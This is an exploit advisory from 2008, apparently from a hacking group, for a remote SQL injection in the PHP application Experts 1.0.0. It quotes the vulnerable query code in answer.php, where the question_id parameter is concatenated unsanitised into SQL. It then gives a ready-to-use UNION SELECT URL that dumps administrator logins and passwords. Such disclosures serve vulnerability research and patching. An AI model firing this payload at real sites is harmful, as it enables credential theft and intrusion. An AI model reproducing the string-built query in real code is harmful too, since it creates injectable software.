=========================================================
 Experts (answer.php) Remote SQL Injection Vulnerability
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `   /
    / XXXXXX /______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Experts
 VERSION     : 1.0.0
 DOWNLOAD    : http://downloads.sourceforge.net/experts
#####################################################

---SQL Injection Exploit---

***magic_quotes_gpc = off***

##################################################################################
Line:
   67:	$con= "SELECT question_text, question_expert, question_category, question_closed,  
   68:	TIME_TO_SEC(TIMEDIFF(NOW(),question_date)) AS seconds_ago, 
   69:	user_login, user_id, category_name, expert_login   
   70:	FROM question 
   71:	INNER JOIN (user,category, expert) 
   72:	ON (question_user=user_id 
   73:	AND question_category=category_id AND question_expert=expert_id ) 
   74:	WHERE question_id=".$question_id;
   75:	//echo $con."<br>";
   76:	$fai_con=mysql_query($con) or die(mysql_error());
##################################################################################

EXPLOIT:

http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,administrator_password),2,3,4,5,6,7,8,9 FROM administrator


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# www.Syue.com [2008-06-10]